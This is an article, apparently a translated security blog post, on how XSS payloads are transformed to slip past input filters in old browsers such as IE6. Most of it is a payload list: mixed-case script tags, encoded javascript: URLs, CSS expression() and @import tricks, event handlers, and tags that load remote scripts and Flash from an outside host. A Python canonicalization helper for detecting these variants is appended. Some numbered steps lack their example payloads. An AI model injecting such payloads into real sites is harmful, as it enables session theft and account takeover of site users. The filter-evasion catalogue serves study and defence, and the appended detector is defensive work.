I. Title: Common transformations of XSS: the evolution of XSS attacks
II. Summary:
This article analyzes common XSS filtering and filter bypasses from the attacker's perspective, which also traces how XSS attacks have evolved.
III. Description:
I have collected some examples of XSS attack and defense from the Internet into this article. It certainly still has room for improvement; please correct me if you have any suggestions.
XSS payloads are not universal across browsers: different browsers react differently to the same XSS input. By comparison, IE8 and Firefox are relatively safe and stricter in filtering XSS attacks. IE6 is only moderately secure: even if the attacker's code is somewhat "malformed", the browser will still "do its best" to parse it. Some other browsers, such as Opera, may handle XSS even less strictly.
This article uses IE6 as the basis for analyzing XSS transformations and bypasses, in order to provide targeted protection.
IV. Details
The basic original form of XSS:
<script>alert("anyunix")</script>
The construction above is too direct and is easily filtered. In practice, against the different filtering mechanisms of different sites, suitably transforming this original form can often bypass a great deal of XSS detection.
V. Evolution
1: The simplest case. Everyone knows that <script> will be filtered, but letter case is often overlooked:
<SCripT>alert("anyunix")</Script>
2: Even if <script> is completely filtered, it does not matter, because many objects support code execution in the "javascript:" form:
3: After the plain javascript: form is also completely filtered, we find that many objects support the "&#ASCII" (numeric character reference) representation:
&#97 can be written as &#097, &#0097, and so on up to &#0000097, and all of these still execute.
&#x61 can likewise be written as &#x061, &#x0061, and so on up to &#x000061.
4: If the encoding is decoded before filtering, insert spaces, tabs, line breaks, and other whitespace characters:
5: The encoded form of TAB and similar characters can also be embedded; char09, char10, and char13 (tab, LF, CR) can all be embedded:
6: When "javascript" itself cannot be used directly, we can use other properties to execute XSS.
<div style="width: expression(alert('anyunix'));">
<STYLE>@import 'http://ha.ckers.org/xss.css';</STYLE>
7: From here, new bypass methods and forms of exploitation naturally follow.
A): Insert comments /* ... */ as interference
<div style="width: expr/* XSS */ession(alert('anyunix'))">
B): Full-width character interference
<div style="width:ExExpression(alert('anyunix'));">
C): Backslash ("\") interference
<STYLE>@im\po\rt 'http://ha.ckers.org/xss.css';</STYLE>
8: If direct execution is completely filtered, we use events to execute XSS.
<body onload=alert('anyunix')>
<isindex type=image src=1 onerror=alert('anyunix')>
9: Flash can be used to execute XSS.
<EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED>
10: Other tags can also be used.
<body background="javascript:alert('xss')">
<link rel="stylesheet" href="http://ha.ckers.org/xss.css">
<table background="javascript:alert('xss')">
Other instances used for obfuscation, interference, and bypass:
<SCRIPT a=">" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT =">" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT a=">'>" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
perl -e 'print "<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>";' > out
The above are some common and practical XSS bypass methods; in practice, several of them are often combined.
For more detailed XSS test scripts, see the examples.
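As an added example that is not part of the original article, the following Python helper shows the defensive counterpart to sections 1 to 7: it canonicalizes an attribute or style value the way an IE6-era parser would (decoding zero-padded numeric references, folding full-width letters, stripping embedded whitespace and NUL bytes, removing CSS comments and backslash escapes) before a filter inspects it, so the variants above all reduce to the same string. The function names and the set of skipped characters are my own assumptions; the hex CSS escape form (\65) goes slightly beyond the page's backslash example.

```python
import html
import re
import unicodedata

# Characters an IE6-era parser skipped inside a URL scheme or CSS identifier
# (the article's "spaces, tabs, line breaks" and char09/char10/char13 cases), plus NUL.
_IGNORED = re.compile(r"[\x00\t\n\r\x0b\x0c ]")
_CSS_COMMENT = re.compile(r"/\*.*?\*/", re.DOTALL)                 # expr/*XSS*/ession
_CSS_ESCAPE = re.compile(r"\\([0-9a-fA-F]{1,6}\s?|.)", re.DOTALL)   # @im\po\rt, \65xpression


def _css_unescape(m) -> str:
    """Apply one CSS backslash escape: hex code point, or the literal next character."""
    body = m.group(1)
    if body[0] in "0123456789abcdefABCDEF":
        code = int(body.strip(), 16)
        return chr(code) if 0 < code <= 0x10FFFF else "\ufffd"
    return body


def canonicalize(value: str, css: bool = False) -> str:
    """Reduce an attribute (or, with css=True, a style) value to the form the
    browser will actually act on, so a filter compares against that rather than
    the raw text. Assumed helper written for this example, not from the article."""
    s = html.unescape(value)                # &#97 &#097 &#0000097 &#x61 &#X0061; ';' optional
    s = unicodedata.normalize("NFKC", s)    # full-width letters fold to ASCII
    if css:
        s = _CSS_COMMENT.sub("", s)
        s = _CSS_ESCAPE.sub(_css_unescape, s)
    s = _IGNORED.sub("", s)
    return s.lower()


def is_script_url(value: str) -> bool:
    """True if an href/src/background value resolves to a javascript: URL."""
    return canonicalize(value).startswith("javascript:")


def css_has_active_content(style: str) -> bool:
    """True if a style value resolves to expression(...) or an @import rule."""
    s = canonicalize(style, css=True)
    return "expression(" in s or "@import" in s


if __name__ == "__main__":
    # Constructed inputs mirroring sections 1, 3, 4/5 and 7 of the article.
    for sample in ["JaVaScRiPt:alert(1)", "&#0000106&#x061vascript:alert(1)",
                   "jav&#x09;a\nscript:alert(1)"]:
        print(repr(sample), "->", is_script_url(sample))
    print(css_has_active_content("width: expr/*XSS*/ession(alert(1))"))
```

Use the canonical form only to decide whether to reject or re-encode a value; never echo the decoded string back into the page.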
By: anyunix